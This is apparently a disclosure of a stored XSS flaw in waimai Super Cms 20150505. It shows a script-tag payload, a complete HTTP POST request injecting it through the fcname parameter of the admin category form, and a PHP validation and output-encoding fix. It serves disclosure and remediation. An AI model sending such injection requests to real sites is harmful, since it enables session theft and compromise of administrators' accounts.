Description
In waimai Super Cms 20150505, there is an XSS vulnerability via the /admin.php/Foodcat/addsave fcname parameter.
Payload: `<script>alert(1);</script>`

```http
POST /sug/waimaicmsn/waimai-master/admin.php?m=Foodcat&a=addsave HTTP/1.1
Host: xx.x.x.x:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Foodcat&a=add
Cookie: wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; page_iframe_url=http://xx.x.x.x:xxxx/x/metinfo6.1.0/feedback/index.php?lang=cn&pageset=1; PHPSESSID=h7ifph1mdupppqcop7hhhd6581; INTELLI_569865769d=5de28b7671feba6befb9abfbac2bf155
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

fcname=form<script>alert(1);</script>&fcsort=0
```
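
One way to close this class of bug, shown as an added example (not code from waimai Super Cms or from the reporter): validate `fcname` when the form is submitted and HTML-encode it wherever it is rendered. The function names `validate_fcname` and `h`, the allow-list rule and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not waimai Super Cms source code.

// Validate the category name on submission. Hypothetical rule: 1-50
// letters, digits, spaces, underscores or hyphens (any script, so
// non-Latin category names still pass).
function validate_fcname(string $raw): ?string
{
    $name = trim($raw);
    // The allow-list rejects < > " ' & and every other markup character.
    if (!preg_match('/^[\p{L}\p{N} _\-]{1,50}$/u', $name)) {
        return null;
    }
    return $name;
}

// Encode at output time for an HTML body or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: the value from the report and a benign name.
$samples = ['form<script>alert(1);</script>', 'Noodles'];

foreach ($samples as $input) {
    $clean = validate_fcname($input);
    if ($clean === null) {
        // Rejected before it reaches storage. The rejected value is still
        // encoded before being echoed back in the error message.
        echo 'rejected: ' . h($input) . PHP_EOL;
    } else {
        // Encode on output even for validated values, so rows saved
        // before the validation existed are rendered inert as well.
        echo 'accepted: <td>' . h($clean) . '</td>' . PHP_EOL;
    }
}
```

Output encoding is the control that matters for rows already stored; the input allow-list only limits what new submissions can contain.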